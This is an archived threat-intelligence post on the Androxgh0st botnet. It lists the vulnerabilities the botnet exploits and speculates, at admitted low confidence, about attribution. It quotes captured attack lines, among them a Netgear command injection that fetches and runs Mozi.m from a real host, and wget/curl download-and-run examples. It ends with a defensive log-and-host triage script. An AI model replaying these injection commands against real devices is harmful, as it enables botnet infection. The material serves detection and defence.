{
	"id": "da02bf1e-8913-4f53-bc71-b71d2be374f4",
	"created_at": "2026-04-06T00:06:46.969485Z",
	"updated_at": "2026-04-10T03:32:20.977468Z",
	"deleted_at": null,
	"sha1_hash": "e7980900e51ed1349bb6b1216fc08c7a366d6c63",
	"title": "Mozi Resurfaces as Androxgh0st Botnet: Unraveling The Latest Exploitation Wave",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 9364606,
	"plain_text": "Mozi Resurfaces as Androxgh0st Botnet: Unraveling The Latest\r\nExploitation Wave\r\nBy Koushik Pal\r\nPublished: 2025-12-13 · Archived: 2026-04-05 19:35:07 UTC\r\nWe value your privacy\r\nWe use cookies to enhance your browsing experience, serve personalised ads or content, and analyse our traffic. By clicking\r\n\"Accept All\", you consent to our use of cookies.\r\nBack\r\nThe Androxgh0st botnet, an emerging cyber threat since January 2024, has resurfaced with advanced capabilities and\r\nintegration of IoT-focused Mozi payloads. Exploiting over 20 vulnerabilities in technologies like Cisco ASA, Atlassian\r\nJIRA, PHP frameworks, and IoT devices, Androxgh0st enables unauthorized access and remote code execution. Its growing\r\nsophistication includes shared infrastructure and malware persistence tactics, posing risks to global web servers and IoT\r\nnetworks. CloudSEK’s research highlights the botnet's operational overlap with Mozi, emphasizing the need for immediate\r\npatching and vigilant monitoring to mitigate exploitation risks.\r\nNovember 6, 2024\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 1 of 32\n\nSubscribe to CloudSEK Resources\r\nGet the latest industry news, threats and resources.\r\nExecutive Summary\r\nCloudSEK’s Threat Research team has identified significant developments in the Androxgh0st botnet, revealing its\r\nexploitation of multiple vulnerabilities and a potential operational integration with the Mozi botnet. Active since January\r\n2024, Androxgh0st is known for targeting web servers, but recent command and control (C2) logs indicate it is also\r\ndeploying IoT-focused Mozi payloads. CISA released an advisory on the botnet earlier this year. The botnet, active since\r\nJanuary 2024, targets a broad range of technologies, including Cisco ASA, Atlassian JIRA, and various PHP frameworks,\r\nallowing unauthorized access and remote code execution. 
This underlines the heightened activity of the botnet operators, who now pursue a wide range of web application vulnerabilities for initial access, in addition to the 3 CVEs reported earlier by CISA. CloudSEK recommends immediate patching of these vulnerabilities to mitigate the risk posed by Androxgh0st, which is known for systematic exploitation and persistent backdoor access.\r\nAnalysis and Attribution\r\nBackground\r\nCloudSEK’s contextual AI digital risk platform XVigil discovered that the Androxgh0st botnet has been exploiting over 20 vulnerabilities since at least August 2024.\r\nCISA released a security advisory in January 2024, raising awareness about the expansion of the Androxgh0st botnet using the 3 initial access vectors listed below:\r\n1. Exploiting PHP Vulnerability (CVE-2017-9841) in PHPUnit: Threat actors target exposed /vendor folders, specifically the eval-stdin.php page of the PHPUnit framework, to execute PHP code remotely and upload malicious files, establishing backdoor access to compromised websites.\r\n2. Targeting Laravel Framework’s .env and Application Key (CVE-2018-15133): Androxgh0st scans for websites with exposed Laravel .env files to steal credentials. If the application key (APP_KEY) is exposed, the attacker uses it to encrypt a malicious serialized PHP object and submits it in the X-XSRF-TOKEN header; a vulnerable Laravel version decrypts and unserializes it, giving remote code execution, file uploads and remote access.\r\n3. Apache Web Server Path Traversal (CVE-2021-41773): Apache HTTP Server 2.4.49 (and 2.4.50, where the incomplete fix is tracked as CVE-2021-42013) allows path traversal to files outside the document root. On servers where those directories are not protected by \"require all denied\" and mod_cgi is enabled, this escalates to arbitrary code execution and exposure of sensitive data or credentials.\r\nAbout Mozi Botnet\r\nThe Mozi botnet primarily spanned China, India and Albania. 
The botnet targeted Netgear, Dasan and D-Link routers and MVPower DVR Jaws servers. In 2021 the authors of the Mozi botnet were arrested by Chinese law enforcement. Later, in August 2023, an update was distributed, either by the creators themselves or by Chinese law enforcement compelling their cooperation, that killed the Mozi agents’ ability to connect to the outside world, leaving only a small fraction of working bots standing.\r\nDuring our investigation we were able to acquire command and control server logs of the Androxgh0st botnet. Our analysis sheds light on the vulnerabilities being exploited by the botnet and on the TTPs it shares with Mozi.\r\nAnalysis\r\nDuring routine scans for malicious infrastructure, CloudSEK’s TRIAD found command and control servers being used by the Androxgh0st botnet.\r\nHunting for malicious infrastructure - found misconfigured Logger and Command Sender panels\r\nAs the panels show, the servers store the POST and GET requests received from the botnet agents over time.\r\nAndroxgh0st botnet is known to send POST requests containing a number of peculiar strings. 
\r\nMatching Androxgh0st Botnet related strings\r\nNow that we have confirmed that these servers are communicating with the botnet agents, let us look at the type of web requests logged on them in order to understand the web application vulnerabilities exploited by the botnet.\r\nVulnerabilities Exploited by Androxgh0st Botnet\r\nCloudSEK’s TRIAD has identified an array of vulnerabilities being exploited by the Androxgh0st botnet to obtain initial access.\r\nAffected Products and Their Impact\r\nAffected Product | Impact\r\nCisco ASA (up to 8.4.7/9.1.4) - CVE-2014-2120 | Injection of arbitrary web script or HTML via an unspecified parameter (XSS)\r\nAtlassian JIRA (before 8.5.14, from 8.6.0 before 8.13.6, from 8.14.0 before 8.16.1) - CVE-2021-26086 | Remote attackers can read particular files via path traversal in the /WEB-INF/web.xml endpoint\r\nMetabase GeoJSON (versions x.40.0-x.40.4) - CVE-2021-41277 | An unauthenticated, remote attacker can use a specially crafted HTTP GET request to download arbitrary files with root privileges and examine environment variables\r\nSophos Firewall (v18.5 MR3 and older) - CVE-2022-1040 | Remote, unauthenticated arbitrary code execution\r\nOracle EBS (12.2.3 through 12.2.11) - CVE-2022-21587 | Unauthenticated arbitrary file upload\r\nOptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 | Authenticated remote code execution\r\nPHP CGI (8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8) - CVE-2024-4577 | Attacker can escape the command line and pass arguments that are interpreted directly by PHP\r\nTP-Link Archer AX21 - CVE-2023-1389 | Unauthenticated command execution as root via the country parameter in /cgi-bin/luci;stok=/locale\r\nWordPress Plugin Background Image Cropper v1.2 | Remote code execution\r\nNetgear DGN devices (DGN1000 firmware \u003c 1.1.00.48, DGN2200 v1) | Unauthenticated command execution with root privileges\r\nGPON Home Routers - CVE-2018-10561, CVE-2018-10562 | Unauthenticated command execution\r\nSpring Cloud Gateway (\u003c 3.0.7 \u0026 \u003c 3.1.1) - CVE-2022-22947 | Code injection leading to remote code execution\r\nZenTao CMS - CNVD-2022-42853 | SQL injection - sensitive information disclosure\r\nAJ-Report - CNVD-2024-15077 | Authentication bypass - remote code execution\r\neYouMail - CNVD-2021-26422 | Remote code execution\r\nLeadsec VPN - CNVD-2021-64035 | Arbitrary file read - sensitive information disclosure\r\nEduSoho | Arbitrary file read - sensitive information disclosure\r\nUFIDA NC BeanShell - CNVD-2021-30167 | Remote code execution\r\nOA E-Cology LoginSSO.jsp - CNVD-2021-33202 | SQL injection - sensitive information disclosure\r\nShopXO Download - CNVD-2021-15822 | Arbitrary file read - sensitive information disclosure\r\nWeaver OA XmlRpcServlet - CNVD-2022-43245 | Arbitrary file read - sensitive information disclosure\r\nRuijie Smartweb | Weak password - guest account takeover\r\nHongjing HCM - CNVD-2023-08743 | SQL injection - sensitive information disclosure\r\nE-Cology V9 - CNVD-2023-12632 | SQL injection - sensitive information disclosure\r\nRuckus Wireless Admin (through 10.4) - CVE-2023-25717 | Remote code execution\r\n1. 
Cisco ASA WebVPN Login Page XSS Vulnerability (CVE-2014-2120): A cross-site scripting (XSS) vulnerability in the WebVPN login page of Cisco Adaptive Security Appliance (ASA) Software allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter.\r\nExploitation attempts - CVE-2014-2120\r\nThe PHP code seen in these exploitation attempts is a small backdoor with two functions.\r\nFile Upload Form:\r\nThe code first renders an HTML form that accepts a file upload (\u003cinput type='file' name='a'\u003e). When a file is submitted it is saved on the server under its original filename using the PHP function move_uploaded_file(), so the attacker can upload arbitrary files to the server.\r\nAppends Code to PHP Files:\r\nIf the URL contains a bak parameter, a second branch is activated. It looks in the current directory for every file with a .php extension and, for each one, appends the contents of the POST variable $_POST['file'] to it. This lets the attacker insert arbitrary PHP code into every PHP file in the directory.\r\nThis appending method spreads the malicious code across multiple PHP files on the server, establishing a more persistent presence and further backdooring the application.\r\n2. Limited Remote File Read in Jira Software Server (CVE-2021-26086): This vulnerability allows remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before 8.5.14, from 8.6.0 before 8.13.6, and from 8.14.0 before 8.16.1.\r\nExploitation attempts - CVE-2021-26086\r\n3. 
Metabase GeoJSON map local file inclusion, versions x.40.0-x.40.4 (CVE-2021-41277): A local file inclusion vulnerability exists in Metabase’s GeoJSON map support. An unauthenticated, remote attacker can exploit it via a specially crafted HTTP GET request to download arbitrary files with root privileges and examine environment variables.\r\nExploitation attempts - CVE-2021-41277\r\n4. Sophos authentication bypass vulnerability leading to RCE (CVE-2022-1040): An authentication bypass issue affecting the firewall’s User Portal and Webadmin web interfaces. The bypass allows a remote, unauthenticated attacker to execute arbitrary code.\r\nExploitation attempts - CVE-2022-1040\r\n5. Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload (CVE-2022-21587): An unauthenticated arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through 12.2.11, can be exploited to gain remote code execution as the oracle user.\r\nExploitation attempts - CVE-2022-21587\r\n6. OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated)\r\nExploitation attempts - OptiLink Authenticated RCE\r\n7. 
PHP CGI Argument Injection (CVE-2024-4577): An argument injection issue in PHP-CGI. On Windows, PHP’s best-fit character mapping turns a soft hyphen (0xAD) in the query string into an ASCII hyphen, so an attacker can smuggle php-cgi command-line options such as -d into the request and override php.ini directives.\r\nExploitation attempts - CVE-2024-4577\r\nIt is not common for botnets to append a string at the end of a web request; in this case the string is “PWN_IT”, which indicates a triggered action.\r\nBy injecting these arguments the attacker is trying to make PHP execute their PWN_IT file. If the file exists on the server and contains malicious PHP code, this leads to remote code execution and control of the server.\r\nBy registering their file as a prepend or append for every PHP request (the auto_prepend_file / auto_append_file directives), the attacker ensures the malicious file runs every time a PHP script runs, which gives them persistence and helps them avoid detection.\r\n8. TP-Link Unauthenticated Command Injection (CVE-2023-1389): A command injection flaw (CVSS 8.8) in TP-Link Archer AX21 firmware allows unauthenticated command execution as root via the country parameter in /cgi-bin/luci;stok=/locale.\r\nExploitation attempts - CVE-2023-1389\r\nThe .sh file fetched through the command injection is the stage-one dropper.\r\nIt downloads files from a remote server, makes them executable, runs them with the argument 'selfrep', and then deletes the downloaded files. This is repeated for multiple files with different names.\r\nThe script downloads and executes files from the remote server at http://154.216.17[.]31, evidently one build per CPU architecture ('tarm', 'tarm5', 'tarm6', 'tarm7', 'tmips', 'tmpsl', 'tsh4', 'tspc', 'tppc', 'tarc'). The downloaded files are made executable and executed with the argument 'selfrep'. 
After execution the downloaded files are deleted.\r\nThe script invokes commands through '/bin/busybox', which indicates it expects a BusyBox-based embedded Linux environment, consistent with its use against TP-Link routers.\r\n9. GeoServer RCE Vulnerability (CVE-2024-36401): GeoServer versions prior to 2.25.1, 2.24.3 and 2.23.5 allow unauthenticated remote code execution by mishandling OGC request parameters, permitting unsafe evaluation of XPath expressions.\r\nExploitation attempts - CVE-2024-36401\r\n10. WordPress Plugin Background Image Cropper v1.2 - Remote Code Execution\r\nExploitation attempts - WordPress Plugin Background Image Cropper RCE\r\n11. WordPress Bruteforce Attacks: The botnet cycles through common administrative usernames with a consistent password pattern. The target URL redirects to /wp-admin/, the backend administration dashboard for WordPress sites. If authentication succeeds, the botnet gains access to critical website controls and settings.\r\nWordpress Bruteforce Attack on Admin Panel\r\n12. Unauthenticated Command Execution on Netgear DGN devices: The embedded web server skips authentication checks for some URLs containing the \"currentsetting.htm\" substring. For example, the following URL can be accessed even by unauthenticated attackers: http://\u003ctarget-ip-address\u003e/setup.cgi?currentsetting.htm=1. The \"setup.cgi\" page can then be abused to execute arbitrary commands. 
For example, to read the /www/.htpasswd local file (containing the clear-text password for the \"admin\" user), an attacker can request the following URL:\r\nhttp://\u003ctarget-ip-address\u003e/setup.cgi?next_file=netgear.cfg\u0026todo=syscmd\u0026cmd=cat+/www/.htpasswd\u0026curpath=/\u0026currentsetting.htm=1\r\nAn attacker can replace the command with any command they want to run.\r\nLooking at the command and control server logs, we noticed a GET request exploiting this old vulnerability, and we can see the injected commands.\r\nNetgear Router Exploitation by Androxgh0st Botnet using Mozi payload\r\nInjected Commands:\r\ncmd=rm -rf /tmp/*; wget http://200.124.241[.]140:44999/Mozi.m -O /tmp/netgear; sh netgear\r\nThe command sequence is as follows:\r\nrm -rf /tmp/*: Deletes everything in /tmp to clear old data and make room for the downloaded malware.\r\nwget http://200.124.241[.]140:44999/Mozi.m -O /tmp/netgear: Uses wget to download a malicious file named Mozi.m from an external server (200.124.241[.]140:44999) and saves it as /tmp/netgear.\r\nsh netgear: Runs the downloaded file as a shell script (the relative name only works if the command runs with /tmp as its working directory). Once executed, the target device becomes part of the botnet.\r\nThe downloaded file, Mozi.m, is associated with the Mozi botnet, a known botnet that primarily targets IoT devices by exploiting vulnerabilities to add them to its network of compromised devices.\r\n13. 
Unauthenticated Command Execution on GPON routers (CVE-2018-10561, CVE-2018-10562):\r\nCVE-2018-10561: Dasan GPON home routers allow authentication bypass by appending ?images/ to URLs that normally require login, such as /menu.html?images/ or /GponForm/diag_Form?images/, enabling unauthorized device access.\r\nCVE-2018-10562: Dasan GPON routers are vulnerable to command injection via the dest_host parameter in a diag_action=ping request to the /GponForm/diag_Form URI. The router stores the ping results in /tmp, which can be read by revisiting /diag.html, so commands can be executed and their output retrieved. Chained, the two bugs give unauthenticated remote command execution.\r\nGPON Router Exploitation by Androxgh0st Botnet using Mozi payload\r\n14. Spring Cloud Gateway \u003c 3.0.7 \u0026 \u003c 3.1.1 Code Injection (CVE-2022-22947): Applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured.\r\nSpring Cloud Gateway Exploitation by Androxgh0st Botnet\r\n15. ZenTao CMS - SQL Injection (CNVD-2022-42853): ZenTao has a SQL injection vulnerability that attackers can exploit to obtain sensitive database information.\r\nZenTao CMS Exploitation by Androxgh0st Botnet\r\n16. AJ-Report Authentication Bypass and Remote Code Execution Vulnerability (CNVD-2024-15077): The platform executes code supplied in the validationRules parameter of a POST request, letting an attacker obtain server permissions and log in to the management backend to take over the dashboard. A remote unauthenticated attacker can compromise the server to steal confidential information, install ransomware, or pivot to the internal network.\r\nAJ-Report Exploitation by Androxgh0st Botnet\r\n17. 
eYouMail - Remote Code Execution (CNVD-2021-26422): eYouMail is susceptible to a remote code execution vulnerability.\r\neYouMail Exploitation by Androxgh0st Botnet\r\n18. Leadsec VPN - Arbitrary File Read (CNVD-2021-64035): An information leakage vulnerability in the SSL VPN of Beijing Wangyuxingyun Information Technology Co., Ltd. can be exploited to read sensitive information from arbitrary files on the server’s file system.\r\nLeadsec VPN Exploitation by Androxgh0st Botnet\r\n19. EduSoho Arbitrary File Read Vulnerability: The classroom-course-statistics interface of this education and training system has an unauthenticated arbitrary file read vulnerability. Through it an attacker can read config/parameters.yml and obtain the secret value and the database account and password stored in that file; the secret value can then be used for further attacks. This product is used predominantly in China.\r\nEduSoho Exploitation by Androxgh0st Botnet\r\n20. UFIDA NC BeanShell Remote Code Execution (CNVD-2021-30167): An attacker can exploit this vulnerability to execute code remotely without authorization. This product is used predominantly in China.\r\nUFIDA NC BeanShell Exploitation by Androxgh0st Botnet\r\n21. OA E-Cology LoginSSO.jsp SQL Injection (CNVD-2021-33202): e-cology is an OA office system, used predominantly in China, built for large and medium-sized enterprises and supporting simultaneous work from PC, mobile and WeChat clients. An attacker could exploit this SQL injection vulnerability to obtain sensitive information.\r\nE-cology Exploitation by Androxgh0st Botnet\r\n22. 
ShopXO Download Arbitrary File Read Vulnerability (CNVD-2021-15822): ShopXO is an open source enterprise-level e-commerce system used predominantly in China. It has an arbitrary file read vulnerability that an attacker can use to obtain sensitive information.\r\nShopXO Exploitation by Androxgh0st Botnet\r\n23. Weaver OA XmlRpcServlet - Arbitrary File Read (CNVD-2022-43245): e-office is a collaborative mobile office platform by Weaver, used predominantly in China. It has an arbitrary file read vulnerability that attackers can exploit to obtain sensitive information.\r\nE-office Exploitation by Androxgh0st Botnet\r\n24. Ruijie Smartweb Weak Password: The Ruijie Smartweb management system (used predominantly in China) ships with a guest account (guest/guest) enabled by default; an attacker can log in to the backend with it and attack further.\r\nRuijie Smartweb Exploitation by Androxgh0st Botnet\r\n25. Hongjing HCM SQL Injection Vulnerability (CNVD-2023-08743): A SQL injection vulnerability exists in the Hongjing Human Resource Management System, through which attackers can obtain sensitive database information.\r\nHongjing HCM Exploitation by Androxgh0st Botnet\r\n26. E-Cology V9 - SQL Injection (CNVD-2023-12632): Ecology9 is a collaborative office system created by Panmicro for medium and large organizations, used predominantly in China. A SQL injection vulnerability in Panmicro ecology9 can be exploited by attackers to obtain sensitive database information.\r\nE-Cology V9 Exploitation by Androxgh0st Botnet\r\n27. Ruckus Wireless Admin through 10.4 (CVE-2023-25717): Ruckus Wireless Admin through 10.4 allows remote code execution via an unauthenticated HTTP GET request. 
Androxgh0st checks whether the network device is running with default credentials and, if so, pings the IP address 45.221.98[.]117.\r\nRuckus Wireless Admin Exploitation by Androxgh0st Botnet\r\nPossibilities:\r\nMozi Payload as a Component of Androxgh0st:\r\nIt is possible that Androxgh0st has fully integrated Mozi’s payload as a module within its own botnet architecture. In that case Androxgh0st is not merely collaborating with Mozi but embedding Mozi’s specific functionality (e.g. IoT infection and propagation mechanisms) into its standard set of operations.\r\nThis would mean that Androxgh0st has expanded to leverage Mozi’s propagation power to infect more IoT devices, using Mozi’s payloads to accomplish goals that would otherwise require separate infection routines.\r\nUnified Command Infrastructure:\r\nIf both botnets are using the same command infrastructure, it points to a high level of operational integration, possibly implying that both Androxgh0st and Mozi are under the control of the same cybercriminal group. This shared infrastructure would streamline control over a broader range of devices, enhancing both the effectiveness and the efficiency of their combined botnet operations.\r\nTRIAD recommends that organizations patch these vulnerabilities being exploited in the wild as soon as possible to reduce the probability of being compromised by the Androxgh0st/Mozi botnet.\r\nTTP Examples: Mozi vs Androxgh0st\r\nTTP | Example - Mozi | Example - Androxgh0st\r\nCommand injection on the same paths | /setup.cgi?cmd=wget+http://[attacker_url]/Mozi.m+-O+/tmp/netgear;sh+netgear | /cgi-bin/admin.cgi?command=ping\u0026ip=127.0.0.1;wget+http://[attacker_url]/androx.sh+-O+/tmp/androx;sh+/tmp/androx\r\nFile inclusion | /admin.cgi?file=../../../../etc/passwd | /config.cgi?file=../../../../../../etc/shadow\r\nExploitation of admin panels using bruteforce | POST /login.cgi?log=admin\u0026pwd=admin123 | POST /wp-login.php?log=admin\u0026pwd=Passnext%40123456\r\nPayload download and execution | wget http://[attacker_url]/mozi_arm; chmod +x mozi_arm; ./mozi_arm \u0026 | curl http://[attacker_url]/androx_arm -o /tmp/androx_arm; chmod +x /tmp/androx_arm; /tmp/androx_arm\r\nBoth botnets share infection tactics involving command injection, credential stuffing, file inclusion, and exploitation of IoT-focused CVEs.\r\nGlobal Infection Statistics\r\nThe number of devices affected by the Androxgh0st botnet is increasing by the day. 
At the time of writing, over 500 devices have been infected.\r\nBots by country\r\nAttribution\r\nLet’s take a closer look at the Ruckus Wireless Admin (CVE-2023-25717) exploitation by the botnet.\r\nAndroxgh0st Botnet pings an IP (part of their infrastructure) as part of the exploitation of the RCE vulnerability\r\nA reverse IP lookup on the IP address reveals two domains:\r\n1xbw[.]com\r\nMgn4[.]com\r\nThe passive DNS history of mgn4[.]com shows that the domain has been rotated across multiple IP addresses in the same subnet since July 2023.\r\nInfrastructure used by the threat actor since July 2023\r\nThis indicates that the threat group has been conducting malicious activity with this domain name since at least July 2023.\r\nInspecting the files that communicate with this domain, we found a malicious Excel file whose filename contains Mandarin characters. This phishing bait, first seen in the wild in July 2023, was used by the threat actors to target a hospital in Hong Kong. The file name translates to “Kwai Chung Hospital DO16191.xlsx” (md5: 039987db7dc1dea01547e0f3066f8d5d).\r\nPhishing bait used by the threat actor first seen in the wild in July 2023 to target a hospital in Hong Kong\r\nComing back to the PHP CGI argument injection, we noticed an uncommon string in the payload. 
As explained earlier, by prepending and appending their file the attacker ensures the malicious file is executed every time a PHP script runs. The string “PWN_IT” is likely an indicator/flag used as part of the persistence mechanism, and we can say with high confidence that it is a name the threat actor(s) chose themselves.\r\nA simple search led us to a CTF team called “pwn_it”, led by the user “ChenSem”. These CTFs are hosted by “Kanxue”, a Chinese developer community focused on security research and reverse engineering of PC, mobile and smart devices; the logo of China’s State Council appears on its website.\r\nThis piqued our interest, as it is not uncommon for CTFs held in China to involve real-world targets. Recent examples have shown that CTF organizers often require students to sign a document agreeing to several unusual terms aimed at keeping such operations covert. Here is what we observed:\r\n1. The latest CTF played by “pwn_it” on Kanxue was in 2020, even though “ChenSem” appears to be a heavy-duty CTF player, as indicated by their score of 501. Interestingly, that was around the same time the world saw heightened Mozi botnet activity in the wild.\r\n2. The CTF hosted by Kanxue in 2024 started in August, around the same time Androxgh0st’s TP-Link exploitation was first observed in the wild.\r\n3. “Pwn_it” has also been used as a function name in source code on multiple occasions. We noticed blogs by “V1ct0r”, who has written over 90 articles on security research and reverse engineering. Their online portfolio is hosted on GitHub (gdufs-king.github[.]io), with Mandarin as the default language. GDUFS refers to the Guangdong University of Foreign Studies, implying that the author was most likely a student at a Chinese university. While no direct relationship has been established between this CTF team and the botnet, the “pwn_it” string, seen here in both malware and web requests, is popular within this CTF team.\r\nConclusion\r\nWe have seen a spike in Androxgh0st targeting technologies used within Chinese ecosystems. This comes after the “kill-switch” was allegedly used by the Chinese authorities in 2023, and it points towards increased mass-surveillance efforts by actors whose activity overlaps with the state’s interests.\r\nWe have observed that the threat actors operating the botnet targeted a hospital in Hong Kong in July 2023, which coincides with the victimology of Chinese APTs such as APT41 and Tonto Team.\r\nBased on the available information, we assess with low confidence that the Androxgh0st botnet is operated by Chinese threat actors driven by interests similar to those of the Chinese state, i.e. mass surveillance. As the i-Soon leaks showed, the APT market is crowded with private companies that provide “pentesting and red-teaming services” to the state.\r\nWe are looking at a trend where the threat actors regularly update their arsenal with the most recent, easily exploitable vulnerabilities. 
We can expect Androxgh0st to be exploiting at least 75% more web-application vulnerabilities by mid-2025 than it is exploiting now.\r\nChecking for signs of compromise\r\n1. Review HTTP and Web Server Logs\r\nCheck for Suspicious Requests: Look for HTTP GET or POST requests that include unusual commands, such as wget or curl, or command-injection parameters such as cmd=rm or cmd=wget. These are common signs of attempted command injection by Androxgh0st.\r\nExample log entries to watch for (note that standard web-server access logs do not record POST bodies, so the credential parameters in the second entry will only be visible where a WAF or request-body logging is in place):\r\nGET /cgi-bin/admin.cgi?command=ping\u0026ip=127.0.0.1;wget+http://[attacker_url]/androx.sh+-O+/tmp/androx;sh+/tmp/androx\r\nPOST /wp-login.php HTTP/1.1 log=admin\u0026pwd=Passnext%40123456\r\nCheck for Unusual Login Attempts: Look for repeated failed login attempts, indicating brute-force activity against login pages such as /wp-login.php, /admin_login, or /cgi-bin/login.cgi. These may target default credentials or weak passwords.\r\n2. Monitor System Processes for Unexpected Activity\r\nIdentify Suspicious Processes: Use commands such as ps aux or top to look for unexpected processes running from unusual locations (e.g., /tmp, /var/tmp, or /dev/shm), which is typical of botnet payloads. Androxgh0st may execute commands such as:\r\n/tmp/androx\r\nInspect Crontab Entries and Startup Scripts: Androxgh0st often attempts persistence by modifying crontab files or startup scripts. Use the following commands to check for suspicious entries:\r\ncrontab -l\r\ncat /etc/rc.local\r\ncat /etc/cron.d/*\r\n3. Examine Suspicious Files in Temporary Directories\r\nInspect /tmp, /var/tmp, and /dev/shm Directories: Androxgh0st payloads and scripts are often downloaded and executed from these directories. 
Look for files with unusual names or recent changes in these locations:\r\nls -la /tmp\r\nls -la /var/tmp\r\nCheck File Permissions and Executable Files: Files in these directories should not normally be executable. Use find to locate executable files in them:\r\nfind /tmp /var/tmp /dev/shm -type f -perm /111\r\n4. Analyze Network Connections and Traffic\r\nMonitor Outbound Connections to Known Malicious IPs or Domains: Androxgh0st may establish connections to its command-and-control (C2) server. Use tools such as netstat or ss to identify active network connections:\r\nnetstat -antp | grep ESTABLISHED\r\nLook for unusual outbound connections on uncommon ports (e.g., high-numbered ports) or to external IPs that you do not recognize.\r\nCheck for Excessive or Unusual Traffic Patterns: Androxgh0st-infected devices may exhibit unusual traffic, particularly if they are participating in a botnet. Monitor traffic for signs of:\r\nRepeated DNS lookups for suspicious domains.\r\nHigh volumes of outbound traffic that may indicate participation in DDoS activity.\r\n5. Review Security Configurations for Changes\r\nCheck for Unexpected Changes to Firewall and Router Settings: Androxgh0st may attempt to open additional ports or modify firewall rules. Review firewall rules and router settings for unexpected modifications.\r\nInspect SSH Configuration for Weaknesses or Unauthorized Keys: If Androxgh0st used SSH brute-forcing to gain access, verify that no new SSH keys have been added to ~/.ssh/authorized_keys for any account, root included. Check:\r\ncat ~/.ssh/authorized_keys\r\n6. Scan for Known Vulnerabilities and Apply Patches\r\nIdentify Vulnerable Services and Applications: Androxgh0st often exploits known vulnerabilities in web servers, routers, and IoT devices. 
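The host and log checks from steps 1 to 5 above, gathered into one script. This is an added example and not code from the CloudSEK post: it assumes a Linux host with GNU find and either ss or netstat, the temp-directory paths named in the post, a threshold of five login POSTs from one client as the brute-force indicator, a search of /root and /home for authorized_keys files, and a constructed, simplified request log (client IP, method, request target) that carries the two attacker request patterns quoted in step 1. The file name triage.sh is likewise an assumption.

```shell
#!/bin/sh
# Added example, not code from the CloudSEK post: a POSIX sh triage helper
# for the log and host checks in steps 1 to 5 above. The request log below
# is constructed for the demo (fields: client IP, method, request target);
# its two attacker lines follow the patterns quoted in step 1. The temp-dir
# paths, the five-POST brute-force threshold and the authorized_keys search
# path are this example's own assumptions. Nothing here touches the network.

# Constructed sample log, deliberately including plain traffic so the
# checks have something to ignore.
sample_access_log() {
    cat <<'EOF'
203.0.113.10 GET /cgi-bin/admin.cgi?command=ping&ip=127.0.0.1;wget+http://198.51.100.9/androx.sh+-O+/tmp/androx;sh+/tmp/androx
192.0.2.5 GET /index.php
198.51.100.7 POST /wp-login.php
198.51.100.7 POST /wp-login.php
198.51.100.7 POST /wp-login.php
198.51.100.7 POST /wp-login.php
198.51.100.7 POST /wp-login.php
192.0.2.8 GET /assets/site.css
203.0.113.44 GET /shell?cmd=wget+http://198.51.100.9/x.sh;sh+/tmp/x
EOF
}

# Step 1a: requests carrying download or command-injection markers
# (wget/curl followed by a separator, cmd=/command= parameters, a shell
# invoked after a semicolon, or a temp path). Reads stdin, prints hits.
scan_injection() {
    grep -E -i '(wget|curl)([+ %]|$)|[?&](cmd|command)=|;(sh|bash)[+ ]|/tmp/|/dev/shm/'
}

# Step 1b: brute-force indicator. Prints <count> <client IP> for every
# client with at least $1 (default 5) POSTs to a login page. Reads stdin.
scan_login_bruteforce() {
    awk -v min=${1:-5} '
        $2 ~ /POST/ && $3 ~ /wp-login[.]php|admin_login|login[.]cgi/ { c[$1]++ }
        END { for (ip in c) if (c[ip] >= min) print c[ip], ip }'
}

# Steps 2 and 3: processes started from, and executables left in, the
# world-writable temp directories the post names. Live host only.
scan_temp_dirs() {
    ps -eo pid,user,args | grep -E '^ *[0-9]+ +[^ ]+ +(/tmp|/var/tmp|/dev/shm)/'
    find /tmp /var/tmp /dev/shm -xdev -type f -perm /111 -exec ls -la {} + 2>/dev/null
}

# Step 2 (crontab and startup scripts) and the persistence check at the
# end of the list: hooks that re-fetch or re-run a dropped file.
scan_persistence() {
    crontab -l 2>/dev/null | grep -E -i '(wget|curl)[+ ]|/tmp/|/var/tmp/|/dev/shm/' | sed 's/^/crontab: /'
    grep -E -i -H '(wget|curl)[+ ]|/tmp/|/var/tmp/|/dev/shm/' /etc/crontab /etc/cron.d/* /etc/rc.local 2>/dev/null
}

# Step 4: established TCP sessions with their owning process; ss preferred.
scan_network() {
    if command -v ss >/dev/null 2>&1; then
        ss -tnp state established
    else
        netstat -antp 2>/dev/null | grep ESTABLISHED
    fi
}

# Step 5: authorized_keys for root and every home directory, listed with
# owner and mtime so a recently added key stands out.
scan_ssh_keys() {
    find /root /home -maxdepth 3 -path '*/.ssh/authorized_keys' -type f -exec ls -la {} + 2>/dev/null
}

case ${1:-demo} in
    host) scan_temp_dirs; scan_persistence; scan_network; scan_ssh_keys ;;
    *)
        echo '== step 1a: download / command-injection markers =='
        sample_access_log | scan_injection
        echo '== step 1b: clients with 5 or more login POSTs =='
        sample_access_log | scan_login_bruteforce 5
        ;;
esac
```

Run it without arguments to see both log checks fire on the constructed sample (two injection hits and one brute-forcing client); run `sh triage.sh host` on a suspect machine for the live host checks, ideally as root so process and socket owners are visible. For a real Apache or nginx access log, reduce the combined log format to the three fields the checks expect with `awk '{print $1, $6, $7}' access.log` and pipe the result into scan_injection and scan_login_bruteforce in turn; the leading quote that awk leaves on the method field does not affect either pattern. Treat a hit as a lead, not a verdict: legitimate deployment scripts also call curl, and a handful of failed logins is normal.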
